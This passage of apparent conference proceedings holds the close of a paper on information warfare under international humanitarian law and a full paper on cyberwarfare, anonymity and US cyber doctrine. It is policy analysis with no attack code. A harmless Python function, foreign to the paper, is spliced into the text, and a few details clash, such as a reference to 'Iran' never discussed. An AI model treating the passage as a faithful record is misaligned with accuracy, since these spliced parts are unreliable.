coercion. The severity of an IW attack might not be identified promptly, so it would not be feasible to<br />
require a victim to conduct a damage assessment to determine whether an IW penetration was a use<br />
of force or merely an act of coercion (Barkham 2001).<br />
3. International legal limits on IW<br />
3.1 Limits on the use of weapons<br />
Many of the international legal provisions regarding armed conflicts are found in the 1949 Geneva<br />
Conventions and the 1977 Additional Protocols to the Geneva Conventions. The Geneva<br />
Conventions, with their focus on the protection of persons in enemy hands, are of some relevance to<br />
IW. Without reference to specific weapons, the Additional Protocols (AP) address various methods<br />
and means of warfare in general terms, thus being able to present a framework for the use of IW.<br />
In order for International Humanitarian Law (IHL) to apply to a particular armed conflict, neither a<br />
formal declaration of war nor recognition of a state of war is required. Instead, the requirements of the law<br />
become applicable as from the actual opening of hostilities. An international armed conflict is<br />
perceived as any difference arising between two States and leading to the intervention of armed<br />
forces, even if one of the Parties denies the existence of a state of war (Pictet 1952).<br />
There is no doubt that an armed conflict exists and IHL applies once traditional kinetic weapons are<br />
used in combination with new methods of IW. The most difficult situation, as far as applicability of IHL<br />
is concerned, would be the one where the first, or the only hostile acts are conducted by means of IW.<br />
The question is whether the qualification of such a conflict as an armed conflict within the meaning of<br />
the 1949 Geneva Conventions and the Additional Protocols depends on the type of attack.<br />
As in the U.N. Charter’s case, the fact that IW developed only after the adoption of the<br />
Protocols does not exclude their applicability. The first Additional Protocol to the Geneva Conventions<br />
made specific reference for consideration of new weapons. Article 36 of Additional Protocol I (AP I) is<br />
a strong indicator that the drafters of AP I anticipated the application of its rules to new developments<br />
of methods and means of warfare. This provision requires that ‘In the study, development, acquisition<br />
or adoption of a new weapon, means or method of warfare, a High Contracting Party is under an<br />
obligation to determine whether its employment would, in some or all circumstances, be prohibited by<br />
this Protocol or by any other rule of international law applicable to the High Contracting Party’<br />
(Protocol Additional to the Geneva Conventions 1977). This statement obligates a nation at least to<br />
consider the laws of armed conflict before employing IW means. That consideration should focus on<br />
both the means of force and perhaps more importantly on the effects.<br />
Consequently, the fact that a particular military activity constituting a method of warfare is not<br />
specifically regulated does not mean that it can be used without restrictions. Based on that, nothing<br />
precludes assuming that the more recent forms of IW, which do not involve the use of traditional<br />
weapons, are subject to IHL just as any new weapon or delivery system has been so far when used in<br />
an armed conflict. (Dörmann 2004)<br />
Another fundamental rule of warfare, found in Article 35 (1) of AP I, states that ‘the right of the Parties<br />
to the conflict to choose methods or means of warfare is not unlimited’ (Protocol Additional to the<br />
Geneva Conventions 1977). So far, hostilities have involved physical violence and kinetic energy<br />
leading to human casualties or material damage. In the case of IHL, the motivation for the application<br />
of the law is to limit the damage and provide care for the casualties. This would support an expansive<br />
interpretation of when IHL begins to apply. If a cyber attack is directed against an enemy in order to<br />
cause physical damage or loss of life, it can hardly be disputed that such an attack is in fact a method<br />
of warfare and is subject to limitations under IHL. (Dörmann 2004)<br />
3.2 The principle of distinction<br />
Just as information warfare attacks may be difficult to encompass within the ‘use of force’ concept, it<br />
may be also difficult to define their targets as military (and thus generally legitimate targets) or civilian<br />
(generally forbidden). The dual-use nature of many telecommunications networks complicates the<br />
questions of the applicability of IHL as a constraint on information warfare, because the intangible<br />
damage that cyber attacks cause may not be the sort of injuries against which the humanitarian law of<br />
war is designed to protect noncombatants. (Greenberg 1998)<br />
The definition of the term “attack” is of decisive importance for the application of the various rules<br />
giving effect to the principle of distinction and for most of the rules providing special protection for<br />
certain objects. In accordance with Art. 49 (1) of AP I, ‘attacks’ means acts of violence against the<br />
adversary, whether in offence or in defense (Protocol Additional to the Geneva Conventions 1977). If<br />
the term ‘acts of violence’ denotes only physical force, the concept of ‘attacks’ excludes dissemination<br />
of propaganda, embargoes or other non-physical means of psychological, political or economic<br />
warfare. (Dörmann 2004)<br />
Based on that understanding and distinction, cyber attacks through viruses, worms, logic bombs etc.<br />
that result in physical damage to persons, or damage to objects that goes beyond the computer<br />
program or data attacked can be qualified as ‘acts of violence’ and thus as an attack in the sense of<br />
IHL. From this point of view, it is helpful to look at how the concept of attack is applied to other means<br />
and methods of warfare. There is general agreement that, for example, the employment of biological<br />
or chemical agents that does not cause a physical explosion, such as the use of asphyxiating or<br />
poisonous gases, would constitute an attack (Dörmann 2004).<br />
If one admits that employing an IW method constitutes an attack, AP I imposes:<br />
 The obligation to direct attacks only against "military objectives" and not to attack civilians or<br />
civilian objects (Protocol Additional to the Geneva Conventions 1977, Art. 48, 51 (2), 52);<br />
 The prohibition of indiscriminate attacks, including attacks that may be expected to cause<br />
excessive incidental civilian casualties or damages (Protocol Additional to the Geneva<br />
Conventions 1977, Art. 51 (4), (5));<br />
 The requirement to take the necessary precautions to ensure that the previous two rules are<br />
respected (Protocol Additional to the Geneva Conventions 1977, Art. 57), in particular the<br />
requirement to minimize incidental civilian damage and the obligation to abstain from attacks if<br />
such damage is likely to be excessive in relation to the value of the military objective to be<br />
attacked (Protocol Additional to the Geneva Conventions 1977, Art. 51 (5)(b), 57 (2)(a)(ii) and (iii)).<br />
These rules operate in exactly the same way whether the attack is carried out using traditional<br />
weapons or IW techniques. Problems that arise in applying these rules are therefore not necessarily<br />
unique to IW. They are more related to the interpretation of, for example, what constitutes a military<br />
objective or which collateral damage would be excessive.<br />
4. Legal perspectives on IW<br />
The laws of war have always faced two challenges. The first is that war's confrontational nature and<br />
tremendously high stakes often frustrate efforts to set reasonable limits on behavior. Fortunately, the<br />
international community has generated international conventions and war crimes tribunals to solve<br />
this problem.<br />
The laws of war also face a second challenge: how to adapt these laws to technological<br />
change. This dynamic is as old as civilization, but it has become more acute in the last one hundred<br />
years as technological progress has accelerated. The result is that weapons are developing much<br />
faster than international law, and there is every reason to believe that this trend will continue to<br />
accelerate in the future.<br />
As IW strategy and technology evolve, international law scholars will have to fit this new kind of<br />
warfare into an analytical framework developed to address a different conception of war.<br />
First, the U.N. Charter and other existing treaty regimes do not create a clear legal prohibition of many<br />
types of IW attacks. For international law to address IW attacks effectively, a correspondence must be<br />
established between terms like ‘use of force’, ‘armed attack’ or ‘armed aggression’ and IW<br />
methods and means of combat. Also, it would be necessary to set limits on IW activities similar to the<br />
classic jus in bello principles, like just war, discrimination or proportionality.<br />
The second, and the more difficult part, is to find a way to solve the practical problems associated<br />
with both launching and defending against cyber attacks, including the fundamental issue of<br />
attribution and in particular state responsibility for cyber attacks. It is technically challenging to localize<br />
the physical place from which such an act originates. But even if the origin of an attack can be<br />
localized within a particular state, it would be challenging to determine whether the attacker was<br />
acting in an individual capacity, or on behalf of a criminal organization, the government or armed<br />
forces.<br />
Just as the identity of the attacker raises difficult questions for any potential IW treaty, so does the<br />
identity of the victim. In an IW context, it becomes necessary to ask whether an attack on a company<br />
or an institution is an attack on a whole country. It is not necessarily clear that the state in whose<br />
territory the injured party resides is the injured state. In a conventional attack, the country where the<br />
attack takes place has been attacked because its territorial integrity has been violated, but cyberspace<br />
is not a customary arena over which states may exercise such control.<br />
From a humanitarian law perspective, it would be essential to be able to ‘mark’ in some way the<br />
information systems used to maintain the viability of critical social infrastructure facilities. In the<br />
physical world, some of these facilities (such as hospitals) display a distinctive sign, indicating their<br />
protected status. Such identifying signs are absent in cyberspace, and no criteria exist for designating<br />
these systems as critical infrastructure.<br />
5. Conclusions<br />
Because of the newness of much of the technology involved, no provision of international law<br />
explicitly addresses information warfare. This absence of prohibitions is significant because, as a<br />
crudely general rule, that which international law does not prohibit it permits. But the absence is not<br />
dispositive, because even where international law does not address particular weapons or<br />
technologies, its general principles may apply to the use of those weapons and technologies<br />
(Greenberg 1998).<br />
Although the existing body of international law does not necessarily provide definitive and universally<br />
accepted answers to the legal issues that Information Warfare development raises, it does provide a<br />
structure by which these issues can be addressed and analyzed. However, in order to apply existing<br />
norms to IW, it is necessary to accept consequence-based interpretations of “armed conflict” and<br />
“attack”. In the absence of such understandings, the applicability, and therefore adequacy, of present-day<br />
humanitarian law principles would come into question. The consideration of IW in the context of<br />
jus ad bellum also leads to consequence-based interpretation.<br />
Devising a system of international law addressing Information Warfare or Information Operations could<br />
rectify many of the deficiencies of the current legal system and provide states with additional<br />
functional benefits that do not currently exist. First, it can remedy uncertainty. Drafting new rules<br />
provides an opportunity to rectify translation problems that plague IW under the law of war. It could<br />
give states and their militaries a clear sense of the rules of engagement in the information age.<br />
A dedicated law would allow states not simply to choose among available interpretations of the<br />
prohibition on the use of force, but to craft a standard tailored to IW without the additional inclusion<br />
problems that currently exist. Similarly, states could set the bar for when IW triggers the civilian<br />
distinction requirement and address whether any or all information networks constitute legitimate<br />
military objectives.<br />
Disclaimer: The views, opinions, and recommendations contained in this analysis are those of the<br />
author and should not be construed as an official position, policy, or decision of the Romanian<br />
Intelligence Service.<br />
6. References<br />
Barkham, J. (2001), Information Warfare and International Law on the Use of Force, New York University Journal<br />
of International Law and Politics, vol. 34, pp. 57-113.<br />
Brownlie, I. (1963), International Law and the Use of Force by States, Clarendon Press, Oxford<br />
Charter of the United Nations and Statute of the International Court of Justice (1985), United Nations,<br />
Department of Public Information<br />
DiCenso, D. (2000), Information Operations: An Act of War?, Air & Space Power Chronicles. Available at<br />
http://www.airpower.maxwell.af.mil/airchronicles/cc.html.<br />
Dörmann, K. (2004), Applicability of the Additional Protocols to Computer Network Attacks, International Expert<br />
Conference on Computer Network Attacks and the Applicability of International Humanitarian Law,<br />
Stockholm. Available at http://www.icrc.org/web/eng/siteeng0.nsf/html/68LG92<br />
Greenberg, L.T., Goodman, S.E., Soo Hoo, K.J. (1998), Information Warfare and International Law, National<br />
Defense University Press. Available at http://www.iwar.org.uk/law/resources/iwlaw/iwilindex.htm<br />
Hollis, D.B. (2007), Why States Need an International Law for Information Operations. Lewis & Clark Law<br />
Review, Vol. 11, p. 1023, Temple University Legal Studies Research Paper No. 2008-43. Available at<br />
http://ssrn.com/abstract=1083889<br />
Joint Chiefs of Staff (1998), Joint Doctrine for Information Operations, Joint Publication 3-13.<br />
Pictet, J. (1952), Commentary on the Geneva Convention for the Amelioration of the Condition of the Wounded<br />
and Sick in Armed Forces in the Field, International Committee of the Red Cross, Geneva.<br />
Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of<br />
International Armed Conflicts (Protocol I), 8 June 1977. Available at http://www.icrc.org<br />
Schmitt, M.N. (1999), Computer Network Attack and the Use of Force in International Law: Thoughts on a<br />
Normative Framework, Columbia Journal of Transnational Law, Vol. 37, 1998-99. Available at:<br />
http://ssrn.com/abstract=1603800<br />
Shackelford, S.J. (2009), From Nuclear War to Net War: Analogizing Cyber Attacks in International Law, Berkeley<br />
Journal of International Law, Vol. 25, No. 3, pp. 191-250.<br />
Cyberwarfare and Anonymity<br />
Christopher Perr<br />
Auburn University, USA<br />
cwp0002@auburn.edu<br />
Abstract: Public policy and strategy do not keep pace with technology. There is generally a lag between the<br />
release and application of a technology and the observation of a shortcoming. Once a shortcoming is<br />
revealed, it is a race to address that potential weakness with improved policy, updated strategy, a technological<br />
initiative to combat the shortcoming, or a necessary combination of all methods. The advent of computer-reliant<br />
and networked systems has created a modern arms race which has seen more innovation and more need for<br />
updated policy and strategy than any other period in history, yet the United States continues to fall behind in this<br />
arms race. When security cannot be verified, but only risk mitigated, it is time to think deterrence. Unfortunately,<br />
deterrence falls apart when you cannot identify the perpetrator behind attacks. This paper will look at the role that<br />
information has played in previous conflicts, as well as the modern strategy towards protecting the United States<br />
in cyberspace, and will draw a singular conclusion as to the best course of action towards improving our security.<br />
Through a mix of policy, strategy, and technology the anonymity which attackers use as a shield needs to be<br />
eliminated in order to allow room for a strong policy of deterrence with a verifiable response. By establishing the<br />
means to identify our attackers and provide serious recourse, cybersecurity can be greatly improved for the<br />
United States.<br />
Keywords: information warfare, security, policy, strategy, history, information security<br />
1. The motivation<br />
“We’re already at war in cyberspace; have been for many years.”<br />
Gen Ronald E. Keys, Commander, Air Combat Command<br />
Fulghum (2007) reported that on 6 September 2007, Israeli aircraft flew into Syria from Turkey and<br />
destroyed a construction site. The site was thought to have contained equipment for the refinement of<br />
weapons-grade nuclear material provided by North Korea.<br />
The interesting part of this story for the purposes of this paper is that Syria, a country with an<br />
advanced anti-air defense system purchased from Russia, did not even see the 10 F-15Is appear on<br />
their radar. These are not stealthy aircraft and, with weapons hanging off the wings, they should have<br />
been easily spotted on radar. Further, troops were massing at Israel’s borders, signaling a possible attack.<br />
Syria was expecting something. So what happened?<br />
The thought is that the Israelis were somehow able to disable the radar sites, providing a window<br />
where the jets could get in, bomb the target, and leave without threat. Was it a trap door in the radar<br />
software? Did the Israelis use a special UAV to signal a blank radar screen to the radar sites? They<br />
haven’t said yet, and the only clear part is that Israel ‘owned’ those sites for a single night and proved<br />
the strength of cyber warfare.<br />
Unfortunately, if the U.S. were in this tale we would be more like Syria than Israel.<br />
2. Open source<br />
Due to publication constraints, and the desire to stay at the unclassified level, this paper will deal only<br />
with open resources.<br />
3. The (not so) recent history of information operations<br />
“It is pointless to deal with enemy military forces if they can be bypassed by strategy or<br />
technology.”<br />
Col John A. Warden III, USAF, Retired<br />
Net-centric warfare has become a much bandied about buzzword in the modern military vernacular. A<br />
simple definition of net-centric warfare from the Office of Force Transformation (2005) is:<br />
“the translation of an information advantage, enabled in part by information technology,<br />
into a competitive war fighting advantage through the use of well-informed geographically<br />
dispersed forces.”<br />
207
Christopher Perr<br />
Historical examples of this can be pointed to before the term ‘IT’ was even coined, one such being<br />
General William T. Sherman’s use of the telegraph to effectively shorten the kill chain of his day.<br />
The kill chain is how forces find, fix, track, target, engage, and assess an enemy force today. It is a<br />
loop where the exit is the destruction of your target. In Sherman’s time the kill chain was shortened by<br />
drastically cutting the amount of time it took to communicate with his geographically separated forces.<br />
None of these terms were used in Sherman’s time, but the concept is not new.<br />
According to Arquilla (2007), Sherman is also useful for another example. His dependence on the<br />
telegraph and the lack of security was highlighted when the Confederate forces started to attack the<br />
lines that carried the vital communications. This caused troops to be pulled from the battlefield for<br />
protection, and while it may have been too late in the war to make a difference, caused a dilution of<br />
the Union’s forces. The telegraph showed how the kill chain can be thought of not in distances but in<br />
time to decision making, and was also shown to be a possible center of gravity to which doctrine must<br />
be modified to defend.<br />
History is rife with examples of how technology has affected the way we think about and execute<br />
conflict. The telegraph was historically the single largest increase in communication bandwidth. As it<br />
was recognized as a powerful tool for command and control, dependence on the telegraph as the only<br />
means of controlling troops was also recognized as a possible center of gravity and a weakness to be<br />
exploited.<br />
4. The (more) recent history of information operations: The environment of<br />
information operations<br />
“An information war is inexpensive, as the enemy country can receive a paralyzing blow<br />
through the Internet, and the party on the receiving end will not be able to tell whether it<br />
is a child’s prank or an attack from its enemy.”<br />
Wei Jincheng, excerpted from the Military Forum column, Liberation Army Daily, 25 June<br />
1996<br />
The First Gulf War is widely viewed as a major success according to Campen (1992). The<br />
preparations involved repetitive rehearsals, planning, critique, and then more rehearsal. The rest of<br />
the world watched as what was, at the time, the fourth largest force in the world got rolled over in a<br />
matter of days. That was 1991, and even though the communication network was almost thrown<br />
together, the tactics and techniques used proved to be game changing.<br />
Baucon (2010) notes that by 1995, forces around the globe had taken such notice of the<br />
revolutionary way U.S. forces had used modified blitzkrieg maneuvers, combined with supreme<br />
command and control enabled by a technical advantage, that those forces had changed their strategy<br />
and force composition. It was clear that smart weapons and the use of information warfare had had a<br />
profound effect.<br />
Fast forward a bit, and a lot has happened since the Gulf War. In 2007 a conflict arose between<br />
Estonia and Russia over the existence and placement of the Bronze Soldier of Tallinn. This spawned what the<br />
Russian government called an ‘online response by patriotic individual citizens’. Estonia, a ‘highly<br />
connected, web-friendly’ country, was now the victim of various bot-net and denial of service attacks<br />
which brought the internet in that country to a halt. Waterman (2007) wrote that the attack was<br />
characterized by Professor James Hendler, a former chief scientist at DARPA, as<br />
“...more like a cyber riot than a military attack”<br />
Speculation seems to imply that the Russian government sought out the help of organized crime and<br />
individual hackers to carry out the attacks. The effect was the same as a conventional siege, and the<br />
attacks were reported as a ‘crime’ by the Russians. The Estonian government requested aid in the<br />
investigation as outlined in the Mutual Legal Assistance Treaty. Russia declined the request (Leyden,<br />
2008).<br />
Another case to look at is the cyber attacks perpetrated by North Korea on the United States and<br />
South Korea in July of 2009. On the 4th of July, North Korea attacked a large number of government<br />
websites with bot-net and DDoS attacks, reportedly seeking political bargaining power. The attacks<br />
were felt only mildly here in the U.S. due to address filtering and the distribution of website sources, but the<br />
attacks again helped to show how vulnerable we are to even unsophisticated cyber attacks (U.S. eyes<br />
N. Korea for ‘massive’ cyber attacks, 2010).<br />
5. The current state of our cyber doctrine<br />
It has become appallingly obvious that our technology has exceeded our humanity.<br />
Albert Einstein<br />
The opening section of this paper ends with a fairly controversial statement, and does so with a purpose.<br />
The cases of Iran and Syria show how a dependence on technology can seriously threaten a nation.<br />
Evidence exists to show that the United States might be in a position where we are overly dependent<br />
on technology in key areas, with a limited ability to defend ourselves. Our current policies regarding<br />
cyber warfare serve as the main cause.<br />
The most recent example to support this statement is in the written answers which General Keith<br />
Alexander, the nominee for commander of the new Cyber Command, provided to the Senate Armed<br />
Services Committee on 15 April 2010. In one question he answered<br />
“President Obama’s cybersecurity sixty-day study highlighted the mismatch between our<br />
technical capabilities to conduct operations and the governing laws and policies, and our<br />
civilian leadership is working hard to resolve the mismatch (Markoff, 2010).”<br />
General Alexander’s response highlights an ongoing issue in the Department of Defense and, since<br />
the vulnerability to the United States extends into the civil realm, in public policy as well. General<br />
Alexander also speaks to the large gap created by having very effective offensive cyber capabilities<br />
without developed defensive capabilities.<br />
The 2003 Information Operations Roadmap served as the initial White House-level guide for how the armed forces conduct information operations (Miller, 2010). The document is very general and stays above the specifics of cyber warfare, but some important information can be gleaned from it. First, cyber warfare is treated as an extension of information and conventional operations. Second, it concluded that our policy and force preparedness were not capable of meeting the country's cyber needs. Third, the civil realm of cyber operations was almost completely ignored, except to note that operations could have some civil effects and that such considerations should be weighed.<br />
The only other repeating theme in the document was to note the need to “deny, degrade, disrupt or<br />
destroy a broad range of adversary threats, sensors, command and control and critical support<br />
infrastructure.” This seems to assume that when cyber warfare comes into play, it will only be against another country with a dependence on technology similar to that of the United States. The document also highlights how the term “cyber war” can be incredibly limiting, neglecting many of the tactics and resources that could be utilized if cyber operations were not limited to ‘conventional war’ alone.<br />
The first main theme is vital to understand, and is echoed in a recent Air and Space Power Journal article, “Cyber This, Cyber That...So What?” (Trias, 2010). The article strongly advocates integrating cyberspace and counter-cyberspace operations with everything from special operations to aerial refueling. Given the pervasive nature of cyberspace, almost all doctrine should be reviewed to include at least the defensive elements of cyber security, and most would probably benefit from considering how offensive cyber operations could aid mission effectiveness.<br />
The article also recognizes how slow and agonizing the process of updating doctrine without clear policy guidance can be:<br />
“Air Force strategists are struggling to create doctrinal principles for cyber warfare in the<br />
form of Air Force Doctrine Document (AFDD) 2-11, “Cyberspace Operations,” now<br />
several years in draft.” (Trias, 2010)<br />
The reason the Air Force could be having such a difficult time is linked to our second issue. In response to the Information Operations Roadmap, major changes began to take place in the cyber realm. New commands and squadrons were stood up across the Department of Defense (DoD) in what, from the outside, looked like a power grab. In eventual response, it was decided that a new joint command was needed to oversee cyber operations and defense and to track capabilities and assets across the DoD.<br />
This command is the new U.S. Cyber Command, announced in June of 2009. Before that, the Air Force had hoped to form its own combatant command, but instead settled for a numbered command. The Navy and Army have their own units as well. With all these new units, confusion regarding responsibility is inevitable.<br />
The mission of U.S. Cyber Command is:<br />
“...to coordinate computer-network defense and direct U.S. cyber attack operations” (US military prepares for ‘cyber command’, 2010).<br />
Unfortunately, this new command with a somewhat clear mission did not seem to solve all of the ills<br />
that cyberspace has created. In January of 2010 the Pentagon attempted to respond to a simulated<br />
cyber attack.<br />
“The results were dispiriting. The enemy has all the advantages: stealth, anonymity, and<br />
unpredictability. No one could pinpoint the country from which the attack came, so there<br />
was no effective way to deter further damage by threatening retaliation. What’s more, the<br />
military commanders noted that they even lacked the military authority to respond, especially because it was never clear if the attack was an act of vandalism, an attempt at<br />
commercial theft, or a state-sponsored effort to cripple the United States, perhaps as a<br />
prelude to conventional war (Markoff, 2010).”<br />
As U.S. Cyber Command has not yet officially stood up, it can only be hoped that the response to a cyber attack will improve once a governing body has been established. Unfortunately, this still leaves a third problem in our cyber strategy: what about the civilian side?<br />
In March of this year a graduate student in Liaoning, China named Wang Jianwei authored a paper titled “Cascade-Based Attack Vulnerability on the U.S. Power Grid.” The paper actually had nothing to do with attacking the U.S. power grid; it was a technical exercise aimed at increasing the security of networked power grids. The paper still provoked cries of outrage and questions as to who was in charge of our grid's well-being. The interesting part to note is that Jianwei chose the U.S. power grid because it had the most information available on the inner workings of the network (Markoff, 2010).<br />
At the same time, according to Nielsen Online, in August of 2009 almost 75% of the United States population was listed as ‘users of the internet’ (Miniwatts Marketing Group, 2009). ‘Internet use’ covers activities such as banking, social networking, commerce, and business. Without even mentioning necessities like the power grid or other services, the e-commerce sector alone was worth more than $100 billion in 2007. It is easy to see why the civilian sector has a vested interest in the handling of cybersecurity. The concern is that the DoD will dominate the area of cybersecurity and the civilian side will be forced to submit to harsh and sometimes arbitrary regulation.<br />
The answer to the concerns raised about the DoD's dominance of cyber security and operations? The Department of Homeland Security will eventually receive a Director for Cybersecurity, and currently has in place an Office of Cybersecurity and Communications, whose specific responsibility is listed below.<br />
“The Office of Cybersecurity and Communications (CS&C) is responsible for enhancing<br />
the security, resiliency, and reliability of the nation’s cyber and communications<br />
infrastructure. CS&C actively engages the public and private sectors as well as<br />
international partners to prepare for, prevent, and respond to catastrophic incidents that<br />
could degrade or overwhelm these strategic assets (Department of Homeland Security,<br />
2010).”<br />
As of right now, it could be said that none of that is taking place. Recently, when Google first feared that its operations in China had been hacked, it turned to the NSA, not the Department of Homeland Security, to help sort out the problem (Markoff, 2010). Where is the communication and organization governing who deals with what? This is without even mentioning that the FBI and the Secret Service both have units that work in cyber security. The FBI is now also responsible for investigating cyber crime against U.S. companies even though an attack may have occurred well outside our borders (FBI probes cyber attack on Citigroup, 2010). With the convoluted policies and rapid changes it is easy to see why one might be confused. There is no clear guide as to who responds, or how.<br />
Unfortunately, that does not bode well for the defense of the United States. The best that can be said<br />
about the current state of our cyber doctrine and policies is that we are rapidly improving, but aren’t<br />
there yet.<br />
6. The proposition<br />
“The dogmas of the quiet past are inadequate to the stormy present. The occasion is<br />
piled high with difficulty, and we must rise with the occasion. As our case is new, so we<br />
must think anew and act anew.”<br />
Abraham Lincoln, President of the United States<br />
Message to Congress, 1 December 1862<br />
When the nuclear bomb was unleashed on the world, individual countries began seeking their own nuclear weapons; as a country, it was difficult to feel safe without one. With a weapon so massive, it was important that an adversary with ‘the bomb’ knew that you had the same capability, and that you would use it if necessary. Unfortunately, this strategy seems ripe to fall apart as the technology proliferates to anonymous parties. Cyber war shares a lot in common with the development of strategy for nuclear weapons: it was a massive revolution in warfighting that spawned a new arms race. In cyberspace, however, anonymity is already a very serious issue. Anonymous parties are able to develop and use very powerful informational weapons, and there is little to identify them or to link them to a party that can be held accountable. On the bright side, while we cannot yet invent a safe nuclear bomb, we can invent a safe internet by making several improvements to the one we have now. Let's think of these improvements in the three ways to affect cybersecurity: strategy, policy, and technological advancement.<br />
Strategy needs to be considered for both the short term and the long term, and is closely tied to technological development. In the short term it is best to consider how to continue patching and modifying our current internet protocols to create a defensible position in cyberspace. This is basically a matter of applying some common rules of cybersecurity. If it doesn't need to be online, don't put it online. If there are serious benefits to be gained by networking a system, such as networking the power grid to facilitate more efficient generation of power, then by all means network the system, but keep it as closed off and private as possible. Finally, when you do need to expose a system to the internet or transmit information, keep classified information separate and secure the site as much as possible. Don't forget to compartmentalize the system as much as possible, geographically distribute your network where appropriate, keep constant backups, and maintain an appropriate level of redundancy. For the short term, if these rules are applied judiciously, we just might make it out alive.<br />
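The connectivity rules above can be read as a simple decision procedure. The sketch below is only an illustrative recasting of this paragraph; the function name and measure labels are invented for the example and are not an official checklist.

```python
def connectivity_decision(needs_internet: bool, networking_benefit: bool) -> list:
    """Return the defensive measures implied by the short-term rules.

    Illustrative only: rule ordering and labels paraphrase the prose above.
    """
    # Rule 1: if it doesn't need to be online, don't put it online.
    if not needs_internet and not networking_benefit:
        return ["keep the system offline"]

    # Rule 2: networked for benefit only -> keep it closed and private.
    measures = ["keep the network as closed and private as possible"]

    # Rule 3: internet-facing systems get extra separation and hardening.
    if needs_internet:
        measures += [
            "keep classified information on separate systems",
            "secure the site as much as possible",
        ]

    # Rules that apply to any networked system:
    measures += [
        "compartmentalize the system",
        "geographically distribute the network where appropriate",
        "keep constant backups",
        "maintain an appropriate level of redundancy",
    ]
    return measures

# Example: a networked-but-private system such as a power-grid control network
# would be evaluated as connectivity_decision(needs_internet=False,
# networking_benefit=True).
```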
Technological advancement and policy will play a smaller but still vital role in the short term. Technologically, it would be impossible to create the defensible position without working to defeat and patch the vulnerabilities that attacks are exploiting, and to track the perpetrators to the ultimate conclusion. To ignore current security flaws in the hope that the next update will close the gap would be to look the other way at our own peril, and to embolden the individuals or governments exploiting the flaws in the current system. In the short term, policy should clearly define the jurisdiction and responsibilities of the agencies and military bodies charged with defending the U.S.'s efforts in cyberspace. This effort should include funding for the technology required to close the gaps in the security of our networked systems. A clear offensive strategy also needs to be articulated in the short term, especially regarding how to strip away the anonymity that antagonistic countries use as a shield for their own offensive cyber operations. Funding for education also needs special consideration, as these antagonistic nations are funding and attracting top-notch talent to their cause instead of working to develop peaceful relations in this realm.<br />
In the long term, the hope is that we can create a much safer and more stable future by applying thoughtful design. In this sense, the long-term goal of cyber strategy and technological development should be to create a network infrastructure that anticipates attack rather than merely reacting to attacks that have already occurred. When the internet was initially developed, the idea was to create a communication scheme that was simple and open, allowing for evolution into a much more complex animal. Having gone through several revisions, it is time to update the protocols and methods used daily to reduce the relative ease of cyber attack. This will be accomplished by setting long-term strategic goals and then funding technological initiatives that are in turn supported by both domestic and international policy. The first step in supporting this strategy is to fund the minds that are interested in forming a safer internet: an internet which limits the<br />
anonymity of attackers, separates classified networks from unclassified ones, develops systems where security is integral to the design, and creates a robust network which recovers gracefully from error and attack while limiting the scope of that attack at every level. This is where funding is necessary for new research and innovation in the relatively immature field of computing and networks.<br />
7. Conclusion<br />
Cyberspace is dangerous and scary. Its borders are vast, and its landscape is constantly changing. Fortunately, operating in cyberspace offers excellent rewards, and given an appropriate but flexible strategy, reinforcing policy measures, and the drive to guide technological development, cyberspace can also be a safe place to operate. This paper should serve as a call to make strides in these three areas, and humbly offers a base guide for tackling both present and future issues in cyberspace.<br />
References<br />
Agence France-Presse, US military prepares for 'cyber command:' official | ABS-CBN News | Latest Philippine<br />
Headlines, Breaking News, Video, Analysis, Features. ABS-CBN News. Available at: http://www.abscbnnews.com/technology/04/24/09/us-military-prepares-cyber-command-official<br />
[Accessed September 11,<br />
2010].<br />
Alexander, K., Advanced Questions for Lieutenant General Keith Alexander, USA, Nominee for Commander,<br />
United States Cyber Command, Available at:<br />
http://docs.google.com/viewer?a=v&q=cache:Kcm4Wm7WxDcJ:armedservices.senate.gov/statemnt/2010/04%2520April/Alexander%252004-15-<br />
10.pdf+Advance+Questions+for+Lieutenant+General+Keith+Alexander,+USA+Nominee+for+Commander&<br />
hl=en&gl=us&pid=bl&srcid=ADGEESii_NfX8DuWogAeIT3BXixKWHsUgQjUlYpebRb4XQjwsDRhXLVTbXwl<br />
aGTT7EulMH-DBJeo4rim_l2kT3M32rWC7AxmMzROsxLQwQVOYDVY2Gi9pKohKDV89kkb-<br />
GHIOMwFll3A&sig=AHIEtbSnKTroECzRqeFhTGnXyvf4JMu62A [Accessed September 11, 2010].<br />
Arquilla, J., 2007. Information strategy and warfare : a guide to theory and practice, New York: Routledge.<br />
Baocun, W. & Fei, L., INFORMATION WARFARE. Available at:<br />
http://www.fas.org/irp/world/china/docs/iw_wang.htm [Accessed September 11, 2010].<br />
Campen, A., 1992. The first information war : the story of communications, computers, and intelligence systems<br />
in the Persian Gulf War, Fairfax Va.: AFCEA International Press.<br />
Clarke, R., 2010. Cyber war : the next threat to national security and what to do about it 1st ed., New York: Ecco.<br />
Department of Homeland Security, DHS | Office of Cybersecurity and Communications. Available at:<br />
http://www.dhs.gov/xabout/structure/gc_1185202475883.shtm [Accessed September 11, 2010].<br />
Fulghum, Israel used electronic attack in air strike against Syrian mystery target - ABC News. Available at:<br />
http://abcnews.go.com/Technology/story?id=3702807&page=1 [Accessed September 11, 2010].<br />
Leyden, J., 2008. Estonia fines man for DDoS attacks • The Register. The Register. Available at:<br />
http://www.theregister.co.uk/2008/01/24/estonian_ddos_fine/ [Accessed September 11, 2010].<br />
Markoff, J., Google Asks N.S.A. to Investigate Cyberattacks - NYTimes.com. Available at:<br />
http://www.nytimes.com/2010/02/05/science/05google.html?fta=y [Accessed September 11, 2010].<br />
Markoff, J. & Barboza, D., Chinese Academics’ Paper on Cyberwar Sets Off Alarms in U.S. - NYTimes.com.<br />
Available at: http://www.nytimes.com/2010/03/21/world/asia/21grid.html?_r=1 [Accessed September 11,<br />
2010].<br />
Markoff, J., Sanger, D.E. & Shanker, T., CYBERWAR - In Digital Combat, U.S. Finds No Easy Deterrent - Series<br />
- NYTimes.com. Available at:<br />
http://query.nytimes.com/gst/fullpage.html?res=9404E4DE123BF935A15752C0A9669D8B63 [Accessed<br />
September 11, 2010].<br />
Miller, F.P., Vandome, A.F. & McBrewster, J., 2010. Information Operations Roadmap.<br />
Miniwatts Marketing Group, United States Internet Usage, Broadband and Telecommunications Reports -<br />
Statistics. Available at: http://www.internetworldstats.com/am/us.htm [Accessed September 11, 2010].<br />
msnbc.com staff, U.S. eyes N. Korea for ‘massive’ cyber attacks - Technology & science - Security - msnbc.com.<br />
Available at: http://www.msnbc.msn.com/id/31789294 [Accessed September 11, 2010].<br />
Office of Force Transformation, 2005. Implementation of Network-Centric Warfare, Office of Force<br />
Transformation.<br />
